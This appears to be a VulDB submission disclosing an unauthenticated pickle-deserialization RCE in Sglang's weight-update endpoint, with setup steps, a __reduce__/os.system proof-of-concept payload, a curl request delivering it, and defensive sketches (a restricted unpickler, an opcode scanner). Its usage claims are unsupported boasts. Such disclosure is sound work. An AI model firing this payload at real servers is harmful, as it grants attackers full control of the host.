| Title | lmsys sglang >=0.4.6 Deserialization |
|---|
| Description | > Author: simonhuang ([email protected]), pjf
> Affected Products or Components
1. **Sglang**: Primarily developed by top global AI institutions such as xAI, Berkeley, ByteDance, and Meta, Sglang is currently the most widely used large model inference framework worldwide. Millions of large model training and inference servers at xAI, Berkeley, ByteDance, Meta, Google, Microsoft, Baidu, Alibaba, and Tencent are running Sglang.
Project URL: https://github.com/sgl-project/sglang
Affected Versions: sglang >= v0.4.6
Initial Vulnerability Introduction Date: 2025-04-13
> Brief Vulnerability Description
Sglang contains a Remote Code Execution (RCE) vulnerability classified as **Critical**.
An unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the target system or obtain a reverse shell, thereby achieving full control over the affected system.
> Technical Details of the Vulnerability
1. **Technical Details**
The vulnerability arises from an insecure deserialization issue in the `/update_weights_from_tensor` endpoint of Sglang. Specifically, it exists in the file `python/sglang/srt/entrypoints/http_server.py`, line 572, in the latest `main` branch of the Sglang project. This endpoint accepts POST data in the following format:
```json
{
  "serialized_named_tensors": ["base64-encoded pickle serialized string"],
  "flush_cache": true
}
```
Each value in `serialized_named_tensors` is base64-decoded and then deserialized with Python's `pickle` module. Because unpickling calls whatever callable an object's `__reduce__` method names, attacker-supplied data results in arbitrary code execution during this deserialization step.
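To illustrate how this step can be constrained, the sketch below decodes a base64 string and unpickles it with a subclass of `pickle.Unpickler` whose `find_class` rejects every global lookup. The names `NoGlobalsUnpickler` and `safe_loads_b64` are hypothetical and not part of Sglang. Real tensor payloads need some globals to be rebuilt, so an actual fix would presumably use a narrow allow-list or a non-pickle format instead of this blanket refusal.

```python
import base64
import io
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any importable name (hypothetical helper)."""

    def find_class(self, module, name):
        # Every GLOBAL / STACK_GLOBAL opcode ends up here; refusing the lookup
        # means no callable can be fetched, so nothing can be invoked later.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def safe_loads_b64(encoded: str):
    """Decode a base64 string and unpickle it without resolving globals."""
    raw = base64.b64decode(encoded, validate=True)
    return NoGlobalsUnpickler(io.BytesIO(raw)).load()


if __name__ == "__main__":
    # Plain containers of built-in types need no globals and load normally.
    plain = base64.b64encode(pickle.dumps({"w": [1.0, 2.0]})).decode()
    print(safe_loads_b64(plain))

    # A pickle that references any callable (here the harmless built-in len)
    # is rejected before the callable is even looked up.
    by_reference = base64.b64encode(pickle.dumps(len)).decode()
    try:
        safe_loads_b64(by_reference)
    except pickle.UnpicklingError as exc:
        print("rejected:", exc)
```

With this approach a payload built around `__reduce__` fails at the lookup of its callable, before anything is executed.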
2. **Detailed Steps to Reproduce the Vulnerability**
2.1 **Target Environment Setup**
In a real-world attack scenario, the attacker would scan for servers running large model inference services. For demonstration, we will either install Sglang manually or use the official Sglang Docker image and run inference on any model (e.g., Llama or Qwen).
**Option 1: Using the Official Sglang Docker Image**
- Step (1): Pull the Docker image
```bash
docker pull lmsysorg/sglang:latest
```
- Step (2): Download the model
```bash
huggingface-cli download --resume-download Qwen/Qwen1.5-0.5B --local-dir Qwen1.5-0.5B --local-dir-use-symlinks False
```
- Step (3): Start the Sglang inference service
```bash
sudo docker run --gpus "0" \
--name sglang0 \
--shm-size 32g \
-p 3456:3456 \
-v /models:/models \
--ipc=host \
lmsysorg/sglang:latest \
python3 -m sglang.launch_server --model-path /models/Qwen1.5-0.5B \
--served-model-name Qwen1.5-0.5B \
--tp-size 1 --mem-fraction-static 0.8 \
--host x.x.x.x --port 3456 &
```
**Option 2: Manual Installation and Inference Setup**
- Step (1): Install Sglang
```bash
pip install --upgrade pip
pip install uv
uv pip install "sglang[all]>=0.5.0rc0"
```
- Step (2): Download the model
```bash
huggingface-cli download --resume-download Qwen/Qwen1.5-0.5B --local-dir Qwen1.5-0.5B --local-dir-use-symlinks False
```
- Step (3): Launch the Sglang inference server
```bash
python3 -m sglang.launch_server --model-path /models/Qwen1.5-0.5B \
--served-model-name Qwen1.5-0.5B \
--tp-size 1 --mem-fraction-static 0.8 \
--host x.x.x.x --port 3456 &
```
After completing either Option 1 or Option 2, the Sglang inference service will be deployed and accessible at `http://<server-ip>:3456`, where `<server-ip>` is the IP address of the server.
2.2 **Constructing the Proof of Concept (PoC)**
Use the following Python script to encode the **malicious payload**:
```python
import base64
import pickle
import os
# Define malicious class
class Malicious:
    def __reduce__(self):
        # Arbitrary code can be executed here; using os.system to run echo as a PoC
        return (os.system, ('echo RCE-Exploit-By-Simon@360!',))
# Serialize the malicious object
malicious_data = pickle.dumps([Malicious()])
# Base64 encode the serialized payload
malicious_b64str = base64.b64encode(malicious_data)
print(malicious_b64str.decode()) # Output: gASVPAAAAAAAAABdlIwFcG9zaXiUjAZzeXN0ZW2Uk5SMHmVjaG8gUkNFLUV4cGxvaXQtQnktU2ltb25AMzYwIZSFlFKUYS4=
```
The output string is the exploit payload (in this example: `gASVPAAAAAAAAABdlIwFcG9zaXiUjAZzeXN0ZW2Uk5SMHmVjaG8gUkNFLUV4cGxvaXQtQnktU2ltb25AMzYwIZSFlFKUYS4=`).
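A payload of this kind can be inspected without running it. The sketch below walks the pickle opcodes with the standard `pickletools.genops` and lists the globals the stream would import. The function name `referenced_globals` is hypothetical, and the handling of `STACK_GLOBAL` is a heuristic that assumes the module and attribute names are the two most recent string arguments, which holds for pickles written by `pickle.dumps` but not necessarily for hand-crafted streams.

```python
import base64
import pickle
import pickletools


def referenced_globals(encoded: str) -> list[str]:
    """List 'module.name' references in a base64 pickle without loading it."""
    raw = base64.b64decode(encoded)
    found = []
    strings = []  # string arguments seen so far, used to resolve STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(raw):
        if opcode.name in ("GLOBAL", "INST"):
            # Older protocols carry "module name" directly in the opcode argument.
            found.append(arg.replace(" ", "."))
        elif opcode.name == "STACK_GLOBAL":
            # Protocol 4+ pushes module and name as two strings beforehand.
            found.append(".".join(strings[-2:]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


if __name__ == "__main__":
    # Harmless demonstration: a list holding a reference to the built-in len.
    sample = base64.b64encode(pickle.dumps([len])).decode()
    print(referenced_globals(sample))
```

Run against the payload string above, a scan like this would be expected to report the `os.system` reference, which is serialized as `posix.system` on Linux. Any non-empty result for data that should contain only tensors is a reason to reject the request.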
2.3 **Executing the Attack**
Send the following HTTP POST request to the target service using `curl`:
```bash
curl --location --request POST 'http://x.x.x.x:3456/update_weights_from_tensor' \
--header 'Content-Type: application/json' \
--data-raw '{
"serialized_named_tensors": ["gASVPAAAAAAAAABdlIwFcG9zaXiUjAZzeXN0ZW2Uk5SMHmVjaG8gUkNFLUV4cGxvaXQtQnktU2ltb25AMzYwIZSFlFKUYS4="],
"flush_cache": true
}'
```
2.4 **Verifying Successful Code Execution**
On the server side, observe the Sglang service logs. You should see an error or log entry indicating that the `echo` command was successfully executed, with the output:
```
RCE-Exploit-By-Simon@360!
```
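The reproduction above succeeds without any credentials. As a rough sketch of a check that could run before any deserialization, the function below accepts a weight-update request only from a loopback address that also presents a shared secret. The function name, the token scheme, and the loopback-only policy are all assumptions for illustration, not Sglang behavior. Multi-node deployments would need a different network policy.

```python
import hmac
import ipaddress


def may_update_weights(client_ip: str, presented_token: str, expected_token: str) -> bool:
    """Return True only for loopback callers that present the shared secret."""
    try:
        addr = ipaddress.ip_address(client_ip)
    except ValueError:
        return False  # not a parseable IP address
    if not addr.is_loopback:
        return False  # assumed policy: weight updates come from the same host
    if not expected_token:
        return False  # refuse to run with an empty or unset secret
    # Constant-time comparison avoids leaking the secret through timing.
    return hmac.compare_digest(presented_token.encode(), expected_token.encode())


if __name__ == "__main__":
    print(may_update_weights("127.0.0.1", "s3cret", "s3cret"))
    print(may_update_weights("10.0.0.5", "s3cret", "s3cret"))
```

A gate of this kind reduces exposure but does not make unpickling untrusted data safe, so it complements a fix to the deserialization itself and does not replace one.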
3. **PoC (Proof of Concept)**
The proof of concept has been fully detailed in section 2 above ("Steps to Reproduce the Vulnerability").
|
|---|
| User | hl4x7eq28 (UID 89020) |
|---|
| Submit | 2025-08-16 07:07 (10 months ago) |
|---|
| Moderation | 2025-09-09 15:23 (24 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 323203 [lmsys sglang 0.4.6 update_weights_from_tensor main serialized_named_tensors privilege escalation] |
|---|
| Points | 17 |
|---|